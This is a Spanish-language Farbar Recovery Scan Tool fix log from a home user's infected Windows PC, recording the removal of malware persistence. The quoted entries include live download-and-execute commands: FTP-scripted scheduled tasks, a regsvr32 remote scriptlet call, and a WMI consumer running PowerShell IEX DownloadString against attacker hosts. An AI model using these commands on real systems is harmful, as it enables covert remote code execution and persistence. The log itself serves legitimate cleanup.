Resultados de la corrección de Farbar Recovery Scan Tool (x64) Versión: 19-04-2020 Ejecutado por Sergio (20-04-2020 12:39:17) Run:1 Ejecutado desde C:\Users\Sergio\Desktop Perfiles cargados: Sergio (Perfiles disponibles: Sergio) Modo de Inicio: Normal ============================================== fixlist contenido: ***************** Start CreateRestorePoint: CloseProcesses: HKLM-x32\...\Run: [win_en_77] => [X] HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ftp1202.site:280/v.sct scrobj.dll <==== ATENCI�N HKU\S-1-5-21-3987761340-688897333-2164730740-1001\...\MountPoints2: {c22f5e7f-c8b7-11e4-97b8-d050990cc891} - E:\HTC_Sync_Manager_PC.exe HKU\S-1-5-21-3987761340-688897333-2164730740-1001\...\MountPoints2: {c3a4be83-c8a2-11e4-9624-d050990cc891} - E:\HTC_Sync_Manager_PC.exe FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restricci�n <==== ATENCI�N CHR HKLM\SOFTWARE\Policies\Google: Restricci�n <==== ATENCI�N Task: {2D6A1470-CFFF-4CE4-9A72-B326F2C3379C} - System32\Tasks\Yandere Simulator => C:\Users\Sergio\AppData\Local\Temp\is-FCU7B.tmp\prsetup.exe <==== ATENCI�N Task: {3C3D898D-DFC3-43B5-B23C-48BF210DBB8C} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATENCI�N Task: {45616622-DBF1-4D54-808E-75A661575493} - System32\Tasks\Mysa => cmd /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATENCI�N Task: {F6711BC9-3704-4C43-AD07-D55BB3145703} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa <==== ATENCI�N Task: {5E3FE145-33FF-4C4B-A958-22A971A17DCD} - System32\Tasks\oka => cmd /c start c:\windows\inf\aspnet\lsma12.exe Task: {83E094F4-AB0D-4F4B-80DF-B9ADE94CFCEF} - System32\Tasks\Mysa3 => cmd /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATENCI�N c:\windows\help\lsmosee.exe c:\windows\debug\item.dat C:\Users\Sergio\AppData\Local\Temp\is-FCU7B.tmp c:\windows\update.exe Task: {D9D8BBBA-2CFF-4AFE-9023-BE619C9C8EF6} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATENCI�N HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{aa65884d-86c8-478b-917a-6fb4b99fadba} <==== ATENCI�N (Restricci�n - IP) HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=131074930739632137&GUID=00000000-0000-0000-0000-000000000000 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=131074930739632137&GUID=00000000-0000-0000-0000-000000000000 HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = about:blank SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = CHR HKU\S-1-5-21-3987761340-688897333-2164730740-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [apdfllckaahabafndbhieahigkjlhalf] - C:\Users\Sergio\AppData\Local\Google\Drive\apdfllckaahabafndbhieahigkjlhalf_live.crx CHR HKLM\...\Chrome\Extension: [kaebhgioafceeldhgjmendlfhbfjefmo] - C:\Program Files (x86)\EagleGet\addon\eagleget_cext@eagleget.com.crx C:\Program Files (x86)\EagleGet CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] S2 AODDriver4.2.0; \??\C:\Program Files\ATI Technologies\ATI.ACE\Fuel\amd64\AODDriver2.sys [X] S2 AODDriver4.3; \??\C:\Program Files\AMD\ATI.ACE\Fuel\amd64\AODDriver2.sys [X] S2 AODDriver4.3.0; \??\C:\Program Files\AMD\Performance Profile Client\amd64\AODDriver2.sys [X] S3 DxkgFilter; \??\C:\Program Files (x86)\iDisplay\idisplay.sys [X] S3 netr28ux; system32\DRIVERS\netr28ux.sys [X] S4 nvlddmkm; system32\DRIVERS\nvlddmkm.sys [X] S4 nvvad_WaveExtensible; system32\drivers\nvvad64v.sys [X] S3 WinRing0_1_2_0; \??\C:\Users\Sergio\AppData\Local\Temp\Rar$EXa0.029\OpenHardwareMonitor\OpenHardwareMonitorLib.sys [X] <==== ATENCI�N 2020-04-20 10:49 - 2020-04-20 10:52 - 000003184 _____ C:\Windows\system32\Tasks\ok 2020-04-20 10:48 - 2020-04-20 10:48 - 000000000 _____ C:\Windows\system32\Tmp6B7E.tmp 2020-04-20 10:48 - 2020-04-20 10:48 - 000000000 _____ C:\Windows\system32\Tmp6B6E.tmp 2020-04-20 10:32 - 2020-04-20 10:52 - 000003168 _____ C:\Windows\system32\Tasks\oka 2020-04-20 10:29 - 2020-04-20 10:52 - 000003518 _____ C:\Windows\system32\Tasks\Mysa 2020-04-20 10:29 - 2020-04-20 10:52 - 000003504 _____ C:\Windows\system32\Tasks\Mysa3 2020-04-20 10:29 - 2020-04-20 10:52 - 000003424 _____ C:\Windows\system32\Tasks\Mysa2 2020-04-20 10:29 - 2020-04-20 10:52 - 000003188 _____ C:\Windows\system32\Tasks\Mysa1 2017-10-31 20:25 - 2017-10-31 20:25 - 000000171 _____ () C:\Users\Sergio\AppData\Roaming\1eb766f2-fed1-4d33-9c39-2c8a972fd11f 2017-10-31 20:25 - 2017-10-31 20:25 - 000000163 _____ () C:\Users\Sergio\AppData\Roaming\4e93aa11-2d46-4980-a421-0a4ac759e5bf 2017-10-31 20:25 - 2017-10-31 20:25 - 000000175 _____ () C:\Users\Sergio\AppData\Roaming\fc19ece2-6b3f-4f22-8758-9651ab9ca388 2017-07-13 00:43 - 2017-07-13 00:43 - 000937776 _____ (AutoIt Team) C:\Users\Sergio\AppData\Roaming\FgYF.exe HKU\S-1-5-21-3987761340-688897333-2164730740-1001\...\ChromeHTML: -> <==== ATENCI�N CustomCLSID: HKU\S-1-5-21-3987761340-688897333-2164730740-1001_Classes\CLSID\{5EF1F961-65E9-BB24-55DB-24F79E56013A}\InprocServer32 -> no ruta de acceso de archivo ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Ning�n archivo ContextMenuHandlers1: [PDFCreator.ShellContextMenu] -> {d9cea52e-100d-4159-89ea-76e845bc13e1} => -> Ning�n archivo WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckamm4\"",Filter="__EventFilter.Name=\"fuckamm3\":: <==== ATENCI�N WMI:subscription\__TimerInstruction->fuckyoumm2_itimer:: <==== ATENCI�N WMI:subscription\__IntervalTimerInstruction->fuckyoumm2_itimer:: <==== ATENCI�N WMI:subscription\__EventFilter->fuckamm3::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'] <==== ATENCI�N WMI:subscription\CommandLineEventConsumer->fuckamm4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http: (la entrada de datos tiene 797 m�s caracteres).] <==== ATENCI�N ShortcutWithArgument: C:\Users\Sergio\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplicaciones de Chrome\Escritorio Remoto de Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> ShortcutWithArgument: C:\Users\Sergio\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\5d696d521de238c3\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google LLC) -> --profile-directory=Default AlternateDataStreams: C:\Windows:nlsPreferences [0] AlternateDataStreams: C:\ProgramData\Nalpeiron:user.ns1 [5] AlternateDataStreams: C:\ProgramData\Nalpeiron:user.ns2 [5] AlternateDataStreams: C:\ProgramData\Nalpeiron:user.ns3 [4] AlternateDataStreams: C:\ProgramData\Nalpeiron:user.ns4 [5] AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxlctlfudivq`qsp`20hfm [0] MSCONFIG\startupreg: d7c24012 => C:\ProgramData\Intel\Wireless\34607c3\hbchgha.exe C:\ProgramData\Intel\Wireless\34607c3\177d256.au3 C:\ProgramData\Intel\Wireless MSCONFIG\startupreg: start => regsvr32 /u /s /i:http://js.0603bye.info:280/v.sct scrobj.dll FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe Ning�n archivo FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe Ning�n archivo HOSTS: REMOVEPROXY: EMPTYTEMP: CMD: netsh winsock reset CMD: ipconfig /renew CMD: ipconfig /flushdns CMD: bitsadmin /reset /allusers CMD: netsh advfirewall reset CMD: netsh advfirewall set allprofiles state ON CMD: netsh int ipv4 reset CMD: netsh int ipv6 reset END ***************** Error: (0) Error al crear un punto de restauración. Procesos cerrados correctamente. "HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\win_en_77" => eliminado correctamente "HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\start" => eliminado correctamente HKU\S-1-5-21-3987761340-688897333-2164730740-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c22f5e7f-c8b7-11e4-97b8-d050990cc891} => eliminado correctamente HKU\S-1-5-21-3987761340-688897333-2164730740-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c3a4be83-c8a2-11e4-9624-d050990cc891} => eliminado correctamente HKLM\SOFTWARE\Policies\Mozilla => eliminado correctamente HKLM\SOFTWARE\Policies\Google => eliminado correctamente "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{2D6A1470-CFFF-4CE4-9A72-B326F2C3379C}" => eliminado correctamente "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2D6A1470-CFFF-4CE4-9A72-B326F2C3379C}" => eliminado correctamente C:\Windows\System32\Tasks\Yandere Simulator => movido correctamente "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Yandere Simulator" => eliminado correctamente "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{3C3D898D-DFC3-43B5-B23C-48BF210DBB8C}" => eliminado correctamente "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3C3D898D-DFC3-43B5-B23C-48BF210DBB8C}" => eliminado correctamente C:\Windows\System32\Tasks\Mysa2 => movido correctamente "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Mysa2" => eliminado correctamente "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{45616622-DBF1-4D54-808E-75A661575493}" => eliminado correctamente "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{45616622-DBF1-4D54-808E-75A661575493}" => eliminado correctamente C:\Windows\System32\Tasks\Mysa => movido correctamente "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Mysa" => eliminado correctamente "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{F6711BC9-3704-4C43-AD07-D55BB3145703}" => eliminado correctamente "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{F6711BC9-3704-4C43-AD07-D55BB3145703}" => eliminado correctamente C:\Windows\System32\Tasks\ok => movido correctamente "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ok" => eliminado correctamente "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{5E3FE145-33FF-4C4B-A958-22A971A17DCD}" => eliminado correctamente "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5E3FE145-33FF-4C4B-A958-22A971A17DCD}" => eliminado correctamente C:\Windows\System32\Tasks\oka => movido correctamente "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\oka" => eliminado correctamente "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{83E094F4-AB0D-4F4B-80DF-B9ADE94CFCEF}" => eliminado correctamente "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{83E094F4-AB0D-4F4B-80DF-B9ADE94CFCEF}" => eliminado correctamente C:\Windows\System32\Tasks\Mysa3 => movido correctamente "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Mysa3" => eliminado correctamente "c:\windows\help\lsmosee.exe" => no encontrado "c:\windows\debug\item.dat" => no encontrado "C:\Users\Sergio\AppData\Local\Temp\is-FCU7B.tmp" => no encontrado c:\windows\update.exe => movido correctamente "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{D9D8BBBA-2CFF-4AFE-9023-BE619C9C8EF6}" => eliminado correctamente "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D9D8BBBA-2CFF-4AFE-9023-BE619C9C8EF6}" => eliminado correctamente C:\Windows\System32\Tasks\Mysa1 => movido correctamente "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Mysa1" => eliminado correctamente "HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local\\ActivePolicy" => eliminado correctamente HKLM\Software\\Microsoft\Internet Explorer\Main\\"Start Page"="http://go.microsoft.com/fwlink/?LinkId=69157" => valor restaurado correctamente HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\"Start Page"="http://go.microsoft.com/fwlink/?LinkId=69157" => valor restaurado correctamente HKLM\Software\\Microsoft\Internet Explorer\Main\\"Default_Page_URL"="http://go.microsoft.com/fwlink/?LinkId=69157" => valor restaurado correctamente HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\"Default_Page_URL"="http://go.microsoft.com/fwlink/?LinkId=69157" => valor restaurado correctamente HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => valor restaurado correctamente HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => eliminado correctamente HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}" => valor restaurado correctamente HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => eliminado correctamente "HKU\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => eliminado correctamente "HKU\S-1-5-19\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => eliminado correctamente "HKU\S-1-5-20\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope" => eliminado correctamente HKU\S-1-5-21-3987761340-688897333-2164730740-1001\SOFTWARE\Google\Chrome\Extensions\apdfllckaahabafndbhieahigkjlhalf => eliminado correctamente HKLM\SOFTWARE\Google\Chrome\Extensions\kaebhgioafceeldhgjmendlfhbfjefmo => eliminado correctamente "C:\Program Files (x86)\EagleGet" => no encontrado HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\eofcbnmajmjmplflapaojjnihcjkigck => eliminado correctamente HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\gomekmidlodglbbmalcneegieacbdmki => eliminado correctamente HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl => eliminado correctamente HKLM\System\CurrentControlSet\Services\AODDriver4.2.0 => eliminado correctamente AODDriver4.2.0 => servicio eliminado correctamente HKLM\System\CurrentControlSet\Services\AODDriver4.3 => eliminado correctamente AODDriver4.3 => servicio eliminado correctamente HKLM\System\CurrentControlSet\Services\AODDriver4.3.0 => eliminado correctamente AODDriver4.3.0 => servicio eliminado correctamente HKLM\System\CurrentControlSet\Services\DxkgFilter => eliminado correctamente DxkgFilter => servicio eliminado correctamente HKLM\System\CurrentControlSet\Services\netr28ux => eliminado correctamente netr28ux => servicio eliminado correctamente HKLM\System\CurrentControlSet\Services\nvlddmkm => eliminado correctamente nvlddmkm => servicio eliminado correctamente HKLM\System\CurrentControlSet\Services\nvvad_WaveExtensible => eliminado correctamente nvvad_WaveExtensible => servicio eliminado correctamente HKLM\System\CurrentControlSet\Services\WinRing0_1_2_0 => eliminado correctamente WinRing0_1_2_0 => servicio eliminado correctamente "C:\Windows\system32\Tasks\ok" => no encontrado C:\Windows\system32\Tmp6B7E.tmp => movido correctamente C:\Windows\system32\Tmp6B6E.tmp => movido correctamente "C:\Windows\system32\Tasks\oka" => no encontrado "C:\Windows\system32\Tasks\Mysa" => no encontrado "C:\Windows\system32\Tasks\Mysa3" => no encontrado "C:\Windows\system32\Tasks\Mysa2" => no encontrado "C:\Windows\system32\Tasks\Mysa1" => no encontrado C:\Users\Sergio\AppData\Roaming\1eb766f2-fed1-4d33-9c39-2c8a972fd11f => movido correctamente C:\Users\Sergio\AppData\Roaming\4e93aa11-2d46-4980-a421-0a4ac759e5bf => movido correctamente C:\Users\Sergio\AppData\Roaming\fc19ece2-6b3f-4f22-8758-9651ab9ca388 => movido correctamente C:\Users\Sergio\AppData\Roaming\FgYF.exe => movido correctamente HKU\S-1-5-21-3987761340-688897333-2164730740-1001_Classes\ChromeHTML => eliminado correctamente HKU\S-1-5-21-3987761340-688897333-2164730740-1001_Classes\CLSID\{5EF1F961-65E9-BB24-55DB-24F79E56013A} => eliminado correctamente HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00asw => eliminado correctamente HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\PDFCreator.ShellContextMenu => eliminado correctamente "CommandLineEventConsumer.Name=\"fuckamm4\"",Filter="__EventFilter.Name=\"fuckamm3\"" => eliminado correctamente "fuckyoumm2_itimer" => eliminado correctamente "fuckyoumm2_itimer" => no encontrado "fuckamm3" => eliminado correctamente "fuckamm4" => eliminado correctamente C:\Users\Sergio\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplicaciones de Chrome\Escritorio Remoto de Chrome.lnk => Acceso directo argumento eliminado correctamente C:\Users\Sergio\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\5d696d521de238c3\Google Chrome.lnk => Acceso directo argumento eliminado correctamente C:\Windows => ":nlsPreferences" ADS eliminado correctamente C:\ProgramData\Nalpeiron => ":user.ns1" ADS eliminado correctamente C:\ProgramData\Nalpeiron => ":user.ns2" ADS eliminado correctamente C:\ProgramData\Nalpeiron => ":user.ns3" ADS eliminado correctamente C:\ProgramData\Nalpeiron => ":user.ns4" ADS eliminado correctamente C:\ProgramData\Reprise => ":wupeogjxlctlfudivq`qsp`20hfm" ADS eliminado correctamente HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\d7c24012 => eliminado correctamente "C:\ProgramData\Intel\Wireless" => no encontrado HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\start => eliminado correctamente "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\SPPSVC-In-TCP-NoScope" => eliminado correctamente "HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\SPPSVC-In-TCP" => eliminado correctamente C:\Windows\System32\Drivers\etc\hosts => movido correctamente Hosts restaurado correctamente. ========= RemoveProxy: ========= HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => eliminado correctamente "HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => eliminado correctamente "HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => eliminado correctamente "HKU\S-1-5-21-3987761340-688897333-2164730740-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer" => eliminado correctamente "HKU\S-1-5-21-3987761340-688897333-2164730740-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => eliminado correctamente "HKU\S-1-5-21-3987761340-688897333-2164730740-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => eliminado correctamente ========= Final de RemoveProxy: ========= ========= netsh winsock reset ========= El cat logo Winsock se restableci¢ correctamente. Debe reiniciar el equipo para completar el restablecimiento. ========= Final de CMD: ========= ========= ipconfig /renew ========= Configuraci¢n IP de Windows Adaptador de Ethernet Conexi¢n de rea local 2: Sufijo DNS espec¡fico para la conexi¢n. . : Direcci¢n IPv4. . . . . . . . . . . . . . : 192.168.0.188 M scara de subred . . . . . . . . . . . . : 255.255.255.0 Puerta de enlace predeterminada . . . . . : 192.168.0.1 ========= Final de CMD: ========= ========= ipconfig /flushdns ========= Configuraci¢n IP de Windows Se vaci¢ correctamente la cach‚ de resoluci¢n de DNS. ========= Final de CMD: ========= ========= bitsadmin /reset /allusers ========= BITSADMIN version 3.0 [ 7.5.7601 ] BITS administration utility. (C) Copyright 2000-2006 Microsoft Corp. BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows. Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets. 0 out of 0 jobs canceled. ========= Final de CMD: ========= ========= netsh advfirewall reset ========= Error al intentar ponerse en contacto con el servicio Firewall de Windows. Aseg£rese de que el servicio se est ejecutando e intente la solicitud de nuevo. ========= Final de CMD: ========= ========= netsh advfirewall set allprofiles state ON ========= Error al intentar ponerse en contacto con el servicio Firewall de Windows. Aseg£rese de que el servicio se est ejecutando e intente la solicitud de nuevo. ========= Final de CMD: ========= ========= netsh int ipv4 reset ========= Interfaz se restableci¢ correctamente. Reinicie el equipo para completar esta acci¢n. ========= Final de CMD: ========= ========= netsh int ipv6 reset ========= Global se restableci¢ correctamente. Interfaz se restableci¢ correctamente. Direcci¢n de unidifusi¢n se restableci¢ correctamente. Ruta se restableci¢ correctamente. Reinicie el equipo para completar esta acci¢n. ========= Final de CMD: ========= =========== EmptyTemp: ========== BITS transfer queue => 8388608 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 4642756 B Java, Flash, Steam htmlcache => 552485729 B Windows/system/drivers => 734650413 B Edge => 0 B Chrome => 366069653 B Firefox => 22318760 B Opera => 0 B Temp, IE cache, history, cookies, recent: Users => 0 B Default => 0 B Public => 0 B ProgramData => 0 B systemprofile => 44046620 B systemprofile32 => 44137988 B LocalService => 44137988 B NetworkService => 44884617 B Sergio => 103617675 B RecycleBin => 1985761 B EmptyTemp: => 1.8 GB datos temporales eliminados. ================================ El sistema necesita reiniciarse. ==== Final de Fixlog 12:40:27 ====